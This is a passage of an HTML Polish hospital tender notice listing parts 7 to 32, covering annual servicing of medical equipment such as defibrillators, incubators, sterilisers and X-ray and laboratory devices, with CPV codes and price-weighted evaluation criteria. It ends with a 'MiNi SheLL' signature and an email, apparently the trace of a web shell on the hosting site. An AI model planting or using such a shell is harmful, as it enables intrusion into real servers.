</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 Defibrylatory, Zestawy reanimacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Defibrylator	CODEMASTER	1	1 x na rok
2.	Defibrylator	SCP  912	2	1 x na rok
3.	Defibrylator	Life Pack 12	9	1 x na rok
4.	Defibrylator	Life Pack 15	3	1 x na rok
5.	Pulsoksymetr	Oxypleth	1	1 x na rok
6.	Pulsoksymetr	N-395	1	1 x na rok
7.	Pulsoksymetr	Ul  2601	1	1 x na rok
8.	Pulsoksymetr	Rad-9	1	1 x na rok
9.	Pulsoksymetr	N  65	7	1 x na rok
10.	Pulsoksymetr	Nowa metrix	3	1 x na rok
11.	Zestaw reanimacyjny	WRK - 331	2	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 Inkubatory i sprzęt do leczenia noworodków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Inkubator Ciepłe gniazdko	Ciepłe gniazdko	1	1 x na rok
2.	Inkubator	RN 04/3M	1	1 x na rok
3.	Inkubator	RN  3M	1	 1 x na  rok 
4.	Inkubator	Atom 2100	1	1 x na rok
5.	Inkubator	Atom V - 85	2	1 x na rok 
6.	Inkubator	IM 7320	1	1 x na  rok
7.	Inkubator	SPN 03	1	1 x na rok
8.	Inkubator	SRN  10	2	1 x na rok
9.	Inkubator zamknięty	Atom V - 2100G	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 Aparaty do znieczulania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Aparat do znieczulania	Anastar N-7	2	2
2.	Aparat do znieczulania	Sulla	1	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 Aparat do znieczulania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1	Aparat do znieczulania 	Fabius	1	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 Lancentrony, Diatermie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1	Lancentron	GT 50	1	1 x na rok
2	Lancentron	GT 300	1	1 x na rok
3	Aparat elektrochirurgiczny	Eltron 120	1	1 x na rok
4.	Aparat elektrochirurgiczny	ES 350/2	2	1 x na rok
5.	Aparat diatermi krótkofalowej 	BTL 20	1	1 x na rok
6.	Aparat elektrochirurgiczny	ES 350	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12 Sterylizatory, autoklawy, destylatorka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Sterylizator	SP 65 G	2	1 x na rok
2.	Sterylizator	SP 32 E	1	1 x na rok
3.	Sterylizator	SP 125 G	1	1 x na rok
4.	Sterylizator parowy	PS 400	1	1 x na rok
5.	Sterylizator parowy przegląd dla UDT	PS 401	1	1 x na rok
6.	Sterylizator	STERIVAP 669	1	1 x na rok
7.	Sterylizator przegląd dla UDT	STERIVAP 669	1	1 x na rok
8.	Sterylizator	Unisterii  336	1	1 x na rok
9.	Sterylizator przegląd dla UDT	Unisterii  336	1	1 x na rok
10.	Autoklaw  kasetowy 	Statim 5000 S	1	1 x na rok
11.	Autoklaw	A-6	2	1 x na rok
12.	Autoklaw przegląd dla UDT	A-6	2	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 Aparatura radiologiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Aparat RTG	Clisis + Argostat	1	1 x na rok
2.	Aparat RTG przyłóżkowy	TX 4 Plus	2	1 x na rok
3.	Aparat RTG ramię C	Philips BV 25	1	1 x na rok
4.	Aparat RTG ramię C	Eposkop 800	1	1 x na rok
5.	Wywoływarka	Optimax	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 Aparatura ultrasonograficzna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Ultrasonograf	SONIC/OP	1	1 x na rok
2.	Ultrasonograf	MYLAB	1	1 x na rok
4.	Ultrasonograf	IN-VISOR	1	1 x na rok
5.	Ultrasonograf	Ultramark	1	1 x na rok
6.	Ultrasonograf	MEGAS  ESAOTE	1	1 x na rok
7.	Ultrasonograf	SPINEL	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 Aparatura endoskopowa I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Gastroskop wideo	Fujinon	1	1 x na rok
2.	Wideokolonoskop	Fujinon	1	1 x na rok
3.	Zestaw wideo do badań endoskopowych	Fujinon	1	1 x na rok
4.	Bronchoskop	FB 12T	1	1 x na rok
5.	Myjka endoskopowa Washer CYW 100 N	Fujinon	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16 Aparatura endoskopowa II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Duodenoskop	TJF 20	1	1 x na rok
2.	Laryngofiberoskop	FB-PE 2	1	1 x na rok
3.	Gastroskop	GIF-E	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 59.04.21.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17 Zestaw Laparoskopowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1	 Zestaw Laparoskopowy  Artropompa 28330020 Hamou  Endomat -  Powershawer  SL 20721020    - osprzęt                                    	   SZTORC                                                                                        	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18 Urządzenia do fizykoterpii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Mixing	2 3M	2	1 x na rok
2.	Magnoter Magnetronic	D 26	2	1 x na rok
3.	Madyn 	D 21	2	1 x na rok
4.	Ultraton	D 200	2	1 x na rok
5.	Stymet	S 200	2	1 x na rok
6.	Stymet	S 210	1	1 x na rok
7.	Interdyn	D 79	1	1 x na rok
8.	Urządzenie do laseroterapii	LAC 50	1	1 x na rok
9.	Urządzenie do laseroterapii	LAC 71	1	1 x na rok
10.	Urządzenie do laseroterapii	LAC 102	1	1 x na rok
11.	Laser bistumilacyjny	30 DCC	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19 Urządzenia do mycia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Myjnia dezynfektor	4656 Getinge	1	1 x na rok
2.	Myjnia dezynfektor do narzędzi	G 7836 CD  MIELLE	1	1 x na rok
3.	Myjnia dezynfektor 	Mielle Picollo 500	2	1 x na rok
4.	Myjnja dezynfektor	Deco 190	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20 Urządzenia laboratoryjne-różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Wytrząsarka	Vortex VX 1	1	1 x na rok
2.	Wytrząsarka	WU 4	1	1 x na rok
3.	Analizator 	Compakt	1	1 x na rok
4.	Mieszadło hematologiczne	UMH-  5	1	1 x na rok
5.	 Organon Technika              	HBs	1	1 x na rok
6.	Desilametr	Lachema	1	1 x na rok
7.	Labulader		1	1 x na rok
8.	Koagulator 	3003	1	1 x na rok
9.	Sumator	Hem.  Kortex	3	1 x na rok
10.	Mikroskop 	Biolar	5	1 x na rok
11.	Mikroskop 	PZO	1	1 x na rok
12.	Mikroskop 	Jenamed	2	1 x na rok
13.	Cieplarka elektryczna	CWE 	6	1 x na rok
14.	Cieplarka elektryczna	CL 65	2	1 x na rok
15.	Myjka ultradzwiekowa	Sonic 5	1	1 x na rok
16.	Łaźnia wodna	LW 102	1	1 x na rok
17.	Łaźnia wodna	Analogowa	2	1 x na rok
18.	Wirówka 	T 24 D	4	1 x na rok
19.	Wirówka 	S 70	1	1 x na rok
20.	Wirówka 	MPW 223	2	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21 Aparat do hemodializy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1	Aparat do terapii nerkozastępczej	Gambro	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie nr 22 Sprzęt medyczny - pozostały.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Analizator glukozy	Hemocue  Glucise	1	1 x na rok
2.	Oksynometr	Atom	1	1 x na rok
3.	Oxiguant	MC	1	1 x na rok
4.	Echowiblator		1	1 x na rok
5.	System ogrzewania pacjenta	Warm Touch	2	1 x na rok
6.	Podgrzewacz płynów infuzyjnych	ANIMEC AM	2	1 x na rok
7.	Detektor  tętna płodu	UDT 10M	1	1 x na rok
8.	Detektor  tętna płodu	Sonicard	2	1 x na rok
9.	Detektor  tętna płodu	300 Brael	1	1 x na rok
10.	Detektor  tętna płodu	20  Brael	1	1 x na rok
11.	Piła do gipsu	Eskulap GA 704	1	1 x na rok
12.	Piła do gipsu	Eskulap G 6100-05	1	1 x na rok
13.	Kapnograf	Nowa Metrix	1	1 x na rok
14.	Kardiostymulator  	MIP -801	1	1 x na rok
15.	Zestaw chirurgiczny - wiertarka	TPS Console	1	1 x na rok
16.	Wiertarka chirurgiczna	G 3004	2	1 x na rok
17.	Rektoskop 	Precoptic	1	1 x na rok
18.	Rektoskop 	uniwersalny	1	1 x na rok
19.	Amnioskop	AS 150	1	1 x na rok
20.	Amnioskop	BOB OM	1	1 x na rok
21.	Fisiotek	2000 E	1	1 x na rok
22.	Kolposkop	KLP 22	1	1 x na rok
23.	Zasilacz opasek zaciskowych		1	1 x na rok
24.	Aparat do kriochirurgii	CRYO-S	1	1 x na rok
25.	Zgrzewarka rolkowa	Steriking RS 120	1	1 x na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie nr 23 Aparatura Echokardiograficzna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1	Echokardiograf 	VIVID 3	1	1 na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie nr 24 Urządzenia do podawania kontrastu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1	Strzykawka automatyczna	Viston	1	1 na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie nr 25 Aparat do znieczulania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1	Aparat do znieczulania 	Penlon	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie nr 26 Aparatura labolatoryjna I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Analizator parametrów krytycznych    	ABL 835 F	1	1
2.	Analizator parametrów krytycznych 	NPT 7	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie nr 27 Aparat medyczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1	Napęd traumatologiczny + osprzęt	3Ti/G672	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zadanie nr 28 Aparatura Labolatoryjna II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1	Analizator hematologiczny Sysmex	KX 21	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zadanie nr 29 Aparatura Labolatoryjna III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Analizator biochemiczny 	Konelab	1	1
2.	Analizator Mikrobiologiczny	Mini Apii	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Zadanie nr 30 Aparatura okulistyczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Autorefraktometr z keratometrem	GR-3100 K	1	1
2.	Rzutnik panel optotyów	Cp 200	1	1
3.	Unit okulistyczny z blatem	Tulipan 840	1	1
4.	Lampa strzelinowa	Rrane YZ5F	1	1
5.	Tonometr aplanacyjny 	L 5110	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Zadanie nr 31 Urzadzenie do badania słuchu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	urządzenie do screningowego badania słuchu OTO READ 		1	1 na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Zadanie nr 32 Wagi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Waga Niemowlęca 		16	1 na rok
2.	Waga osobowa ze wzrostomierzem		14	1 na rok
3.	Waga elektroniczna	AXIS,  Nadwag	3	1 na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com